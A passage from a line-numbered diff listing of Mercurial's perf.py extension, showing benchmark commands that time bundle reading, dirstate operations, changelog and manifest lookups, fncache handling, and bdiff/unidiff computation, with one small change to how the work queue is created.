585 (makestdioread(8192), 'read(8k)'),
576 (makestdioread(16384), 'read(16k)'),
586 (makestdioread(16384), 'read(16k)'),
577 (makestdioread(32768), 'read(32k)'),
587 (makestdioread(32768), 'read(32k)'),
578 (makestdioread(131072), 'read(128k)'),
588 (makestdioread(131072), 'read(128k)'),
579 ]
589 ]
580
590
581 with open(bundlepath, 'rb') as fh:
591 with open(bundlepath, 'rb') as fh:
582 bundle = exchange.readbundle(ui, fh, bundlepath)
592 bundle = exchange.readbundle(ui, fh, bundlepath)
583
593
584 if isinstance(bundle, changegroup.cg1unpacker):
594 if isinstance(bundle, changegroup.cg1unpacker):
585 benches.extend([
595 benches.extend([
586 (makebench(deltaiter), 'cg1 deltaiter()'),
596 (makebench(deltaiter), 'cg1 deltaiter()'),
587 (makebench(iterchunks), 'cg1 getchunks()'),
597 (makebench(iterchunks), 'cg1 getchunks()'),
588 (makereadnbytes(8192), 'cg1 read(8k)'),
598 (makereadnbytes(8192), 'cg1 read(8k)'),
589 (makereadnbytes(16384), 'cg1 read(16k)'),
599 (makereadnbytes(16384), 'cg1 read(16k)'),
590 (makereadnbytes(32768), 'cg1 read(32k)'),
600 (makereadnbytes(32768), 'cg1 read(32k)'),
591 (makereadnbytes(131072), 'cg1 read(128k)'),
601 (makereadnbytes(131072), 'cg1 read(128k)'),
592 ])
602 ])
593 elif isinstance(bundle, bundle2.unbundle20):
603 elif isinstance(bundle, bundle2.unbundle20):
594 benches.extend([
604 benches.extend([
595 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
605 (makebench(forwardchunks), 'bundle2 forwardchunks()'),
596 (makebench(iterparts), 'bundle2 iterparts()'),
606 (makebench(iterparts), 'bundle2 iterparts()'),
597 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
607 (makebench(iterpartsseekable), 'bundle2 iterparts() seekable'),
598 (makebench(seek), 'bundle2 part seek()'),
608 (makebench(seek), 'bundle2 part seek()'),
599 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
609 (makepartreadnbytes(8192), 'bundle2 part read(8k)'),
600 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
610 (makepartreadnbytes(16384), 'bundle2 part read(16k)'),
601 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
611 (makepartreadnbytes(32768), 'bundle2 part read(32k)'),
602 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
612 (makepartreadnbytes(131072), 'bundle2 part read(128k)'),
603 ])
613 ])
604 elif isinstance(bundle, streamclone.streamcloneapplier):
614 elif isinstance(bundle, streamclone.streamcloneapplier):
605 raise error.Abort('stream clone bundles not supported')
615 raise error.Abort('stream clone bundles not supported')
606 else:
616 else:
607 raise error.Abort('unhandled bundle type: %s' % type(bundle))
617 raise error.Abort('unhandled bundle type: %s' % type(bundle))
608
618
609 for fn, title in benches:
619 for fn, title in benches:
610 timer, fm = gettimer(ui, opts)
620 timer, fm = gettimer(ui, opts)
611 timer(fn, title=title)
621 timer(fn, title=title)
612 fm.end()
622 fm.end()
613
623
614 @command('perfchangegroupchangelog', formatteropts +
624 @command('perfchangegroupchangelog', formatteropts +
615 [('', 'version', '02', 'changegroup version'),
625 [('', 'version', '02', 'changegroup version'),
616 ('r', 'rev', '', 'revisions to add to changegroup')])
626 ('r', 'rev', '', 'revisions to add to changegroup')])
617 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
627 def perfchangegroupchangelog(ui, repo, version='02', rev=None, **opts):
618 """Benchmark producing a changelog group for a changegroup.
628 """Benchmark producing a changelog group for a changegroup.
619
629
620 This measures the time spent processing the changelog during a
630 This measures the time spent processing the changelog during a
621 bundle operation. This occurs during `hg bundle` and on a server
631 bundle operation. This occurs during `hg bundle` and on a server
622 processing a `getbundle` wire protocol request (handles clones
632 processing a `getbundle` wire protocol request (handles clones
623 and pull requests).
633 and pull requests).
624
634
625 By default, all revisions are added to the changegroup.
635 By default, all revisions are added to the changegroup.
626 """
636 """
627 cl = repo.changelog
637 cl = repo.changelog
628 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
638 revs = [cl.lookup(r) for r in repo.revs(rev or 'all()')]
629 bundler = changegroup.getbundler(version, repo)
639 bundler = changegroup.getbundler(version, repo)
630
640
631 def lookup(node):
641 def lookup(node):
632 # The real bundler reads the revision in order to access the
642 # The real bundler reads the revision in order to access the
633 # manifest node and files list. Do that here.
643 # manifest node and files list. Do that here.
634 cl.read(node)
644 cl.read(node)
635 return node
645 return node
636
646
637 def d():
647 def d():
638 for chunk in bundler.group(revs, cl, lookup):
648 for chunk in bundler.group(revs, cl, lookup):
639 pass
649 pass
640
650
641 timer, fm = gettimer(ui, opts)
651 timer, fm = gettimer(ui, opts)
642 timer(d)
652 timer(d)
643 fm.end()
653 fm.end()
644
654
645 @command('perfdirs', formatteropts)
655 @command('perfdirs', formatteropts)
646 def perfdirs(ui, repo, **opts):
656 def perfdirs(ui, repo, **opts):
647 timer, fm = gettimer(ui, opts)
657 timer, fm = gettimer(ui, opts)
648 dirstate = repo.dirstate
658 dirstate = repo.dirstate
649 'a' in dirstate
659 'a' in dirstate
650 def d():
660 def d():
651 dirstate.hasdir('a')
661 dirstate.hasdir('a')
652 del dirstate._map._dirs
662 del dirstate._map._dirs
653 timer(d)
663 timer(d)
654 fm.end()
664 fm.end()
655
665
656 @command('perfdirstate', formatteropts)
666 @command('perfdirstate', formatteropts)
657 def perfdirstate(ui, repo, **opts):
667 def perfdirstate(ui, repo, **opts):
658 timer, fm = gettimer(ui, opts)
668 timer, fm = gettimer(ui, opts)
659 "a" in repo.dirstate
669 "a" in repo.dirstate
660 def d():
670 def d():
661 repo.dirstate.invalidate()
671 repo.dirstate.invalidate()
662 "a" in repo.dirstate
672 "a" in repo.dirstate
663 timer(d)
673 timer(d)
664 fm.end()
674 fm.end()
665
675
666 @command('perfdirstatedirs', formatteropts)
676 @command('perfdirstatedirs', formatteropts)
667 def perfdirstatedirs(ui, repo, **opts):
677 def perfdirstatedirs(ui, repo, **opts):
668 timer, fm = gettimer(ui, opts)
678 timer, fm = gettimer(ui, opts)
669 "a" in repo.dirstate
679 "a" in repo.dirstate
670 def d():
680 def d():
671 repo.dirstate.hasdir("a")
681 repo.dirstate.hasdir("a")
672 del repo.dirstate._map._dirs
682 del repo.dirstate._map._dirs
673 timer(d)
683 timer(d)
674 fm.end()
684 fm.end()
675
685
676 @command('perfdirstatefoldmap', formatteropts)
686 @command('perfdirstatefoldmap', formatteropts)
677 def perfdirstatefoldmap(ui, repo, **opts):
687 def perfdirstatefoldmap(ui, repo, **opts):
678 timer, fm = gettimer(ui, opts)
688 timer, fm = gettimer(ui, opts)
679 dirstate = repo.dirstate
689 dirstate = repo.dirstate
680 'a' in dirstate
690 'a' in dirstate
681 def d():
691 def d():
682 dirstate._map.filefoldmap.get('a')
692 dirstate._map.filefoldmap.get('a')
683 del dirstate._map.filefoldmap
693 del dirstate._map.filefoldmap
684 timer(d)
694 timer(d)
685 fm.end()
695 fm.end()
686
696
687 @command('perfdirfoldmap', formatteropts)
697 @command('perfdirfoldmap', formatteropts)
688 def perfdirfoldmap(ui, repo, **opts):
698 def perfdirfoldmap(ui, repo, **opts):
689 timer, fm = gettimer(ui, opts)
699 timer, fm = gettimer(ui, opts)
690 dirstate = repo.dirstate
700 dirstate = repo.dirstate
691 'a' in dirstate
701 'a' in dirstate
692 def d():
702 def d():
693 dirstate._map.dirfoldmap.get('a')
703 dirstate._map.dirfoldmap.get('a')
694 del dirstate._map.dirfoldmap
704 del dirstate._map.dirfoldmap
695 del dirstate._map._dirs
705 del dirstate._map._dirs
696 timer(d)
706 timer(d)
697 fm.end()
707 fm.end()
698
708
699 @command('perfdirstatewrite', formatteropts)
709 @command('perfdirstatewrite', formatteropts)
700 def perfdirstatewrite(ui, repo, **opts):
710 def perfdirstatewrite(ui, repo, **opts):
701 timer, fm = gettimer(ui, opts)
711 timer, fm = gettimer(ui, opts)
702 ds = repo.dirstate
712 ds = repo.dirstate
703 "a" in ds
713 "a" in ds
704 def d():
714 def d():
705 ds._dirty = True
715 ds._dirty = True
706 ds.write(repo.currenttransaction())
716 ds.write(repo.currenttransaction())
707 timer(d)
717 timer(d)
708 fm.end()
718 fm.end()
709
719
710 @command('perfmergecalculate',
720 @command('perfmergecalculate',
711 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
721 [('r', 'rev', '.', 'rev to merge against')] + formatteropts)
712 def perfmergecalculate(ui, repo, rev, **opts):
722 def perfmergecalculate(ui, repo, rev, **opts):
713 timer, fm = gettimer(ui, opts)
723 timer, fm = gettimer(ui, opts)
714 wctx = repo[None]
724 wctx = repo[None]
715 rctx = scmutil.revsingle(repo, rev, rev)
725 rctx = scmutil.revsingle(repo, rev, rev)
716 ancestor = wctx.ancestor(rctx)
726 ancestor = wctx.ancestor(rctx)
717 # we don't want working dir files to be stat'd in the benchmark, so prime
727 # we don't want working dir files to be stat'd in the benchmark, so prime
718 # that cache
728 # that cache
719 wctx.dirty()
729 wctx.dirty()
720 def d():
730 def d():
721 # acceptremote is True because we don't want prompts in the middle of
731 # acceptremote is True because we don't want prompts in the middle of
722 # our benchmark
732 # our benchmark
723 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
733 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
724 acceptremote=True, followcopies=True)
734 acceptremote=True, followcopies=True)
725 timer(d)
735 timer(d)
726 fm.end()
736 fm.end()
727
737
728 @command('perfpathcopies', [], "REV REV")
738 @command('perfpathcopies', [], "REV REV")
729 def perfpathcopies(ui, repo, rev1, rev2, **opts):
739 def perfpathcopies(ui, repo, rev1, rev2, **opts):
730 timer, fm = gettimer(ui, opts)
740 timer, fm = gettimer(ui, opts)
731 ctx1 = scmutil.revsingle(repo, rev1, rev1)
741 ctx1 = scmutil.revsingle(repo, rev1, rev1)
732 ctx2 = scmutil.revsingle(repo, rev2, rev2)
742 ctx2 = scmutil.revsingle(repo, rev2, rev2)
733 def d():
743 def d():
734 copies.pathcopies(ctx1, ctx2)
744 copies.pathcopies(ctx1, ctx2)
735 timer(d)
745 timer(d)
736 fm.end()
746 fm.end()
737
747
738 @command('perfphases',
748 @command('perfphases',
739 [('', 'full', False, 'include file reading time too'),
749 [('', 'full', False, 'include file reading time too'),
740 ], "")
750 ], "")
741 def perfphases(ui, repo, **opts):
751 def perfphases(ui, repo, **opts):
742 """benchmark phasesets computation"""
752 """benchmark phasesets computation"""
743 timer, fm = gettimer(ui, opts)
753 timer, fm = gettimer(ui, opts)
744 _phases = repo._phasecache
754 _phases = repo._phasecache
745 full = opts.get('full')
755 full = opts.get('full')
746 def d():
756 def d():
747 phases = _phases
757 phases = _phases
748 if full:
758 if full:
749 clearfilecache(repo, '_phasecache')
759 clearfilecache(repo, '_phasecache')
750 phases = repo._phasecache
760 phases = repo._phasecache
751 phases.invalidate()
761 phases.invalidate()
752 phases.loadphaserevs(repo)
762 phases.loadphaserevs(repo)
753 timer(d)
763 timer(d)
754 fm.end()
764 fm.end()
755
765
756 @command('perfmanifest', [], 'REV')
766 @command('perfmanifest', [], 'REV')
757 def perfmanifest(ui, repo, rev, **opts):
767 def perfmanifest(ui, repo, rev, **opts):
758 timer, fm = gettimer(ui, opts)
768 timer, fm = gettimer(ui, opts)
759 ctx = scmutil.revsingle(repo, rev, rev)
769 ctx = scmutil.revsingle(repo, rev, rev)
760 t = ctx.manifestnode()
770 t = ctx.manifestnode()
761 def d():
771 def d():
762 repo.manifestlog.clearcaches()
772 repo.manifestlog.clearcaches()
763 repo.manifestlog[t].read()
773 repo.manifestlog[t].read()
764 timer(d)
774 timer(d)
765 fm.end()
775 fm.end()
766
776
767 @command('perfchangeset', formatteropts)
777 @command('perfchangeset', formatteropts)
768 def perfchangeset(ui, repo, rev, **opts):
778 def perfchangeset(ui, repo, rev, **opts):
769 timer, fm = gettimer(ui, opts)
779 timer, fm = gettimer(ui, opts)
770 n = scmutil.revsingle(repo, rev).node()
780 n = scmutil.revsingle(repo, rev).node()
771 def d():
781 def d():
772 repo.changelog.read(n)
782 repo.changelog.read(n)
773 #repo.changelog._cache = None
783 #repo.changelog._cache = None
774 timer(d)
784 timer(d)
775 fm.end()
785 fm.end()
776
786
777 @command('perfindex', formatteropts)
787 @command('perfindex', formatteropts)
778 def perfindex(ui, repo, **opts):
788 def perfindex(ui, repo, **opts):
779 import mercurial.revlog
789 import mercurial.revlog
780 timer, fm = gettimer(ui, opts)
790 timer, fm = gettimer(ui, opts)
781 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
791 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
782 n = repo["tip"].node()
792 n = repo["tip"].node()
783 svfs = getsvfs(repo)
793 svfs = getsvfs(repo)
784 def d():
794 def d():
785 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
795 cl = mercurial.revlog.revlog(svfs, "00changelog.i")
786 cl.rev(n)
796 cl.rev(n)
787 timer(d)
797 timer(d)
788 fm.end()
798 fm.end()
789
799
790 @command('perfstartup', formatteropts)
800 @command('perfstartup', formatteropts)
791 def perfstartup(ui, repo, **opts):
801 def perfstartup(ui, repo, **opts):
792 timer, fm = gettimer(ui, opts)
802 timer, fm = gettimer(ui, opts)
793 cmd = sys.argv[0]
803 cmd = sys.argv[0]
794 def d():
804 def d():
795 if os.name != 'nt':
805 if os.name != 'nt':
796 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
806 os.system("HGRCPATH= %s version -q > /dev/null" % cmd)
797 else:
807 else:
798 os.environ['HGRCPATH'] = ' '
808 os.environ['HGRCPATH'] = ' '
799 os.system("%s version -q > NUL" % cmd)
809 os.system("%s version -q > NUL" % cmd)
800 timer(d)
810 timer(d)
801 fm.end()
811 fm.end()
802
812
803 @command('perfparents', formatteropts)
813 @command('perfparents', formatteropts)
804 def perfparents(ui, repo, **opts):
814 def perfparents(ui, repo, **opts):
805 timer, fm = gettimer(ui, opts)
815 timer, fm = gettimer(ui, opts)
806 # control the number of commits perfparents iterates over
816 # control the number of commits perfparents iterates over
807 # experimental config: perf.parentscount
817 # experimental config: perf.parentscount
808 count = getint(ui, "perf", "parentscount", 1000)
818 count = getint(ui, "perf", "parentscount", 1000)
809 if len(repo.changelog) < count:
819 if len(repo.changelog) < count:
810 raise error.Abort("repo needs %d commits for this test" % count)
820 raise error.Abort("repo needs %d commits for this test" % count)
811 repo = repo.unfiltered()
821 repo = repo.unfiltered()
812 nl = [repo.changelog.node(i) for i in xrange(count)]
822 nl = [repo.changelog.node(i) for i in xrange(count)]
813 def d():
823 def d():
814 for n in nl:
824 for n in nl:
815 repo.changelog.parents(n)
825 repo.changelog.parents(n)
816 timer(d)
826 timer(d)
817 fm.end()
827 fm.end()
818
828
819 @command('perfctxfiles', formatteropts)
829 @command('perfctxfiles', formatteropts)
820 def perfctxfiles(ui, repo, x, **opts):
830 def perfctxfiles(ui, repo, x, **opts):
821 x = int(x)
831 x = int(x)
822 timer, fm = gettimer(ui, opts)
832 timer, fm = gettimer(ui, opts)
823 def d():
833 def d():
824 len(repo[x].files())
834 len(repo[x].files())
825 timer(d)
835 timer(d)
826 fm.end()
836 fm.end()
827
837
828 @command('perfrawfiles', formatteropts)
838 @command('perfrawfiles', formatteropts)
829 def perfrawfiles(ui, repo, x, **opts):
839 def perfrawfiles(ui, repo, x, **opts):
830 x = int(x)
840 x = int(x)
831 timer, fm = gettimer(ui, opts)
841 timer, fm = gettimer(ui, opts)
832 cl = repo.changelog
842 cl = repo.changelog
833 def d():
843 def d():
834 len(cl.read(x)[3])
844 len(cl.read(x)[3])
835 timer(d)
845 timer(d)
836 fm.end()
846 fm.end()
837
847
838 @command('perflookup', formatteropts)
848 @command('perflookup', formatteropts)
839 def perflookup(ui, repo, rev, **opts):
849 def perflookup(ui, repo, rev, **opts):
840 timer, fm = gettimer(ui, opts)
850 timer, fm = gettimer(ui, opts)
841 timer(lambda: len(repo.lookup(rev)))
851 timer(lambda: len(repo.lookup(rev)))
842 fm.end()
852 fm.end()
843
853
844 @command('perfrevrange', formatteropts)
854 @command('perfrevrange', formatteropts)
845 def perfrevrange(ui, repo, *specs, **opts):
855 def perfrevrange(ui, repo, *specs, **opts):
846 timer, fm = gettimer(ui, opts)
856 timer, fm = gettimer(ui, opts)
847 revrange = scmutil.revrange
857 revrange = scmutil.revrange
848 timer(lambda: len(revrange(repo, specs)))
858 timer(lambda: len(revrange(repo, specs)))
849 fm.end()
859 fm.end()
850
860
851 @command('perfnodelookup', formatteropts)
861 @command('perfnodelookup', formatteropts)
852 def perfnodelookup(ui, repo, rev, **opts):
862 def perfnodelookup(ui, repo, rev, **opts):
853 timer, fm = gettimer(ui, opts)
863 timer, fm = gettimer(ui, opts)
854 import mercurial.revlog
864 import mercurial.revlog
855 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
865 mercurial.revlog._prereadsize = 2**24 # disable lazy parser in old hg
856 n = scmutil.revsingle(repo, rev).node()
866 n = scmutil.revsingle(repo, rev).node()
857 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
867 cl = mercurial.revlog.revlog(getsvfs(repo), "00changelog.i")
858 def d():
868 def d():
859 cl.rev(n)
869 cl.rev(n)
860 clearcaches(cl)
870 clearcaches(cl)
861 timer(d)
871 timer(d)
862 fm.end()
872 fm.end()
863
873
864 @command('perflog',
874 @command('perflog',
865 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
875 [('', 'rename', False, 'ask log to follow renames')] + formatteropts)
866 def perflog(ui, repo, rev=None, **opts):
876 def perflog(ui, repo, rev=None, **opts):
867 if rev is None:
877 if rev is None:
868 rev = []
878 rev = []
869 timer, fm = gettimer(ui, opts)
879 timer, fm = gettimer(ui, opts)
870 ui.pushbuffer()
880 ui.pushbuffer()
871 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
881 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
872 copies=opts.get('rename')))
882 copies=opts.get('rename')))
873 ui.popbuffer()
883 ui.popbuffer()
874 fm.end()
884 fm.end()
875
885
876 @command('perfmoonwalk', formatteropts)
886 @command('perfmoonwalk', formatteropts)
877 def perfmoonwalk(ui, repo, **opts):
887 def perfmoonwalk(ui, repo, **opts):
878 """benchmark walking the changelog backwards
888 """benchmark walking the changelog backwards
879
889
880 This also loads the changelog data for each revision in the changelog.
890 This also loads the changelog data for each revision in the changelog.
881 """
891 """
882 timer, fm = gettimer(ui, opts)
892 timer, fm = gettimer(ui, opts)
883 def moonwalk():
893 def moonwalk():
884 for i in xrange(len(repo), -1, -1):
894 for i in xrange(len(repo), -1, -1):
885 ctx = repo[i]
895 ctx = repo[i]
886 ctx.branch() # read changelog data (in addition to the index)
896 ctx.branch() # read changelog data (in addition to the index)
887 timer(moonwalk)
897 timer(moonwalk)
888 fm.end()
898 fm.end()
889
899
890 @command('perftemplating', formatteropts)
900 @command('perftemplating', formatteropts)
891 def perftemplating(ui, repo, rev=None, **opts):
901 def perftemplating(ui, repo, rev=None, **opts):
892 if rev is None:
902 if rev is None:
893 rev = []
903 rev = []
894 timer, fm = gettimer(ui, opts)
904 timer, fm = gettimer(ui, opts)
895 ui.pushbuffer()
905 ui.pushbuffer()
896 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
906 timer(lambda: commands.log(ui, repo, rev=rev, date='', user='',
897 template='{date|shortdate} [{rev}:{node|short}]'
907 template='{date|shortdate} [{rev}:{node|short}]'
898 ' {author|person}: {desc|firstline}\n'))
908 ' {author|person}: {desc|firstline}\n'))
899 ui.popbuffer()
909 ui.popbuffer()
900 fm.end()
910 fm.end()
901
911
902 @command('perfcca', formatteropts)
912 @command('perfcca', formatteropts)
903 def perfcca(ui, repo, **opts):
913 def perfcca(ui, repo, **opts):
904 timer, fm = gettimer(ui, opts)
914 timer, fm = gettimer(ui, opts)
905 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
915 timer(lambda: scmutil.casecollisionauditor(ui, False, repo.dirstate))
906 fm.end()
916 fm.end()
907
917
908 @command('perffncacheload', formatteropts)
918 @command('perffncacheload', formatteropts)
909 def perffncacheload(ui, repo, **opts):
919 def perffncacheload(ui, repo, **opts):
910 timer, fm = gettimer(ui, opts)
920 timer, fm = gettimer(ui, opts)
911 s = repo.store
921 s = repo.store
912 def d():
922 def d():
913 s.fncache._load()
923 s.fncache._load()
914 timer(d)
924 timer(d)
915 fm.end()
925 fm.end()
916
926
917 @command('perffncachewrite', formatteropts)
927 @command('perffncachewrite', formatteropts)
918 def perffncachewrite(ui, repo, **opts):
928 def perffncachewrite(ui, repo, **opts):
919 timer, fm = gettimer(ui, opts)
929 timer, fm = gettimer(ui, opts)
920 s = repo.store
930 s = repo.store
921 s.fncache._load()
931 s.fncache._load()
922 lock = repo.lock()
932 lock = repo.lock()
923 tr = repo.transaction('perffncachewrite')
933 tr = repo.transaction('perffncachewrite')
924 def d():
934 def d():
925 s.fncache._dirty = True
935 s.fncache._dirty = True
926 s.fncache.write(tr)
936 s.fncache.write(tr)
927 timer(d)
937 timer(d)
928 tr.close()
938 tr.close()
929 lock.release()
939 lock.release()
930 fm.end()
940 fm.end()
931
941
932 @command('perffncacheencode', formatteropts)
942 @command('perffncacheencode', formatteropts)
933 def perffncacheencode(ui, repo, **opts):
943 def perffncacheencode(ui, repo, **opts):
934 timer, fm = gettimer(ui, opts)
944 timer, fm = gettimer(ui, opts)
935 s = repo.store
945 s = repo.store
936 s.fncache._load()
946 s.fncache._load()
937 def d():
947 def d():
938 for p in s.fncache.entries:
948 for p in s.fncache.entries:
939 s.encode(p)
949 s.encode(p)
940 timer(d)
950 timer(d)
941 fm.end()
951 fm.end()
942
952
943 def _bdiffworker(q, blocks, xdiff, ready, done):
953 def _bdiffworker(q, blocks, xdiff, ready, done):
944 while not done.is_set():
954 while not done.is_set():
945 pair = q.get()
955 pair = q.get()
946 while pair is not None:
956 while pair is not None:
947 if xdiff:
957 if xdiff:
948 mdiff.bdiff.xdiffblocks(*pair)
958 mdiff.bdiff.xdiffblocks(*pair)
949 elif blocks:
959 elif blocks:
950 mdiff.bdiff.blocks(*pair)
960 mdiff.bdiff.blocks(*pair)
951 else:
961 else:
952 mdiff.textdiff(*pair)
962 mdiff.textdiff(*pair)
953 q.task_done()
963 q.task_done()
954 pair = q.get()
964 pair = q.get()
955 q.task_done() # for the None one
965 q.task_done() # for the None one
956 with ready:
966 with ready:
957 ready.wait()
967 ready.wait()
958
968
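# _bdiffworker drains text pairs from a shared queue until it sees a None
# sentinel, calling task_done() for every item (including the sentinel) so
# the producer can join(). A minimal sketch of the producer side, matching
# how perfbdiff below drives the workers:
#
#   q = queue()
#   for pair in textpairs:
#       q.put(pair)
#   for i in xrange(threads):
#       q.put(None)    # one sentinel per worker
#   q.join()           # wait for every task_done()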
959 @command('perfbdiff', revlogopts + formatteropts + [
969 @command('perfbdiff', revlogopts + formatteropts + [
960 ('', 'count', 1, 'number of revisions to test (starting at REV)'),
970 ('', 'count', 1, 'number of revisions to test (starting at REV)'),
961 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
971 ('', 'alldata', False, 'test bdiffs for all associated revisions'),
962 ('', 'threads', 0, 'number of threads to use (disable with 0)'),
972 ('', 'threads', 0, 'number of threads to use (disable with 0)'),
963 ('', 'blocks', False, 'test computing diffs into blocks'),
973 ('', 'blocks', False, 'test computing diffs into blocks'),
964 ('', 'xdiff', False, 'use xdiff algorithm'),
974 ('', 'xdiff', False, 'use xdiff algorithm'),
965 ],
975 ],
966
976
967 '-c|-m|FILE REV')
977 '-c|-m|FILE REV')
968 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
978 def perfbdiff(ui, repo, file_, rev=None, count=None, threads=0, **opts):
969 """benchmark a bdiff between revisions
979 """benchmark a bdiff between revisions
970
980
971 By default, benchmark a bdiff between the given revision and its delta parent.
981 By default, benchmark a bdiff between the given revision and its delta parent.
972
982
973 With ``--count``, benchmark bdiffs between delta parents and self for N
983 With ``--count``, benchmark bdiffs between delta parents and self for N
974 revisions starting at the specified revision.
984 revisions starting at the specified revision.
975
985
976 With ``--alldata``, assume the requested revision is a changeset and
986 With ``--alldata``, assume the requested revision is a changeset and
977 measure bdiffs for all changes related to that changeset (manifest
987 measure bdiffs for all changes related to that changeset (manifest
978 and filelogs).
988 and filelogs).
979 """
989 """
980 opts = pycompat.byteskwargs(opts)
990 opts = pycompat.byteskwargs(opts)
981
991
982 if opts['xdiff'] and not opts['blocks']:
992 if opts['xdiff'] and not opts['blocks']:
983 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
993 raise error.CommandError('perfbdiff', '--xdiff requires --blocks')
984
994
985 if opts['alldata']:
995 if opts['alldata']:
986 opts['changelog'] = True
996 opts['changelog'] = True
987
997
988 if opts.get('changelog') or opts.get('manifest'):
998 if opts.get('changelog') or opts.get('manifest'):
989 file_, rev = None, file_
999 file_, rev = None, file_
990 elif rev is None:
1000 elif rev is None:
991 raise error.CommandError('perfbdiff', 'invalid arguments')
1001 raise error.CommandError('perfbdiff', 'invalid arguments')
992
1002
993 blocks = opts['blocks']
1003 blocks = opts['blocks']
994 xdiff = opts['xdiff']
1004 xdiff = opts['xdiff']
995 textpairs = []
1005 textpairs = []
996
1006
997 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
1007 r = cmdutil.openrevlog(repo, 'perfbdiff', file_, opts)
998
1008
999 startrev = r.rev(r.lookup(rev))
1009 startrev = r.rev(r.lookup(rev))
1000 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1010 for rev in range(startrev, min(startrev + count, len(r) - 1)):
1001 if opts['alldata']:
1011 if opts['alldata']:
1002 # Load revisions associated with changeset.
1012 # Load revisions associated with changeset.
1003 ctx = repo[rev]
1013 ctx = repo[rev]
1004 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1014 mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
1005 for pctx in ctx.parents():
1015 for pctx in ctx.parents():
1006 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1016 pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
1007 textpairs.append((pman, mtext))
1017 textpairs.append((pman, mtext))
1008
1018
1009 # Load filelog revisions by iterating manifest delta.
1019 # Load filelog revisions by iterating manifest delta.
1010 man = ctx.manifest()
1020 man = ctx.manifest()
1011 pman = ctx.p1().manifest()
1021 pman = ctx.p1().manifest()
1012 for filename, change in pman.diff(man).items():
1022 for filename, change in pman.diff(man).items():
1013 fctx = repo.file(filename)
1023 fctx = repo.file(filename)
1014 f1 = fctx.revision(change[0][0] or -1)
1024 f1 = fctx.revision(change[0][0] or -1)
1015 f2 = fctx.revision(change[1][0] or -1)
1025 f2 = fctx.revision(change[1][0] or -1)
1016 textpairs.append((f1, f2))
1026 textpairs.append((f1, f2))
1017 else:
1027 else:
1018 dp = r.deltaparent(rev)
1028 dp = r.deltaparent(rev)
1019 textpairs.append((r.revision(dp), r.revision(rev)))
1029 textpairs.append((r.revision(dp), r.revision(rev)))
1020
1030
1021 withthreads = threads > 0
1031 withthreads = threads > 0
1022 if not withthreads:
1032 if not withthreads:
1023 def d():
1033 def d():
1024 for pair in textpairs:
1034 for pair in textpairs:
1025 if xdiff:
1035 if xdiff:
1026 mdiff.bdiff.xdiffblocks(*pair)
1036 mdiff.bdiff.xdiffblocks(*pair)
1027 elif blocks:
1037 elif blocks:
1028 mdiff.bdiff.blocks(*pair)
1038 mdiff.bdiff.blocks(*pair)
1029 else:
1039 else:
1030 mdiff.textdiff(*pair)
1040 mdiff.textdiff(*pair)
1031 else:
1041 else:
1032 q = util.queue()
1042 q = queue()
1033 for i in xrange(threads):
1043 for i in xrange(threads):
1034 q.put(None)
1044 q.put(None)
1035 ready = threading.Condition()
1045 ready = threading.Condition()
1036 done = threading.Event()
1046 done = threading.Event()
1037 for i in xrange(threads):
1047 for i in xrange(threads):
1038 threading.Thread(target=_bdiffworker,
1048 threading.Thread(target=_bdiffworker,
1039 args=(q, blocks, xdiff, ready, done)).start()
1049 args=(q, blocks, xdiff, ready, done)).start()
1040 q.join()
1050 q.join()
1041 def d():
1051 def d():
1042 for pair in textpairs:
1052 for pair in textpairs:
1043 q.put(pair)
1053 q.put(pair)
1044 for i in xrange(threads):
1054 for i in xrange(threads):
1045 q.put(None)
1055 q.put(None)
1046 with ready:
1056 with ready:
1047 ready.notify_all()
1057 ready.notify_all()
1048 q.join()
1058 q.join()
1049 timer, fm = gettimer(ui, opts)
1059 timer, fm = gettimer(ui, opts)
1050 timer(d)
1060 timer(d)
1051 fm.end()
1061 fm.end()
1052
1062
1053 if withthreads:
1063 if withthreads:
1054 done.set()
1064 done.set()
1055 for i in xrange(threads):
1065 for i in xrange(threads):
1056 q.put(None)
1066 q.put(None)
1057 with ready:
1067 with ready:
1058 ready.notify_all()
1068 ready.notify_all()
1059
1069
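# Editor's note: like the other perf* commands, this is run with
# contrib/perf.py enabled as an extension; the revision numbers below are
# only illustrative:
#
#     $ hg --config extensions.perf=contrib/perf.py perfbdiff -m 100
#     $ hg --config extensions.perf=contrib/perf.py perfbdiff --alldata --count 10 100
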
@command('perfunidiff', revlogopts + formatteropts + [
    ('', 'count', 1, 'number of revisions to test (when using --startrev)'),
    ('', 'alldata', False, 'test unidiffs for all associated revisions'),
    ], '-c|-m|FILE REV')
def perfunidiff(ui, repo, file_, rev=None, count=None, **opts):
    """benchmark a unified diff between revisions

    This doesn't include any copy tracing - it's just a unified diff
    of the texts.

    By default, benchmark a diff between the requested revision and its
    delta parent.

    With ``--count``, benchmark diffs between delta parents and self for N
    revisions starting at the specified revision.

    With ``--alldata``, assume the requested revision is a changeset and
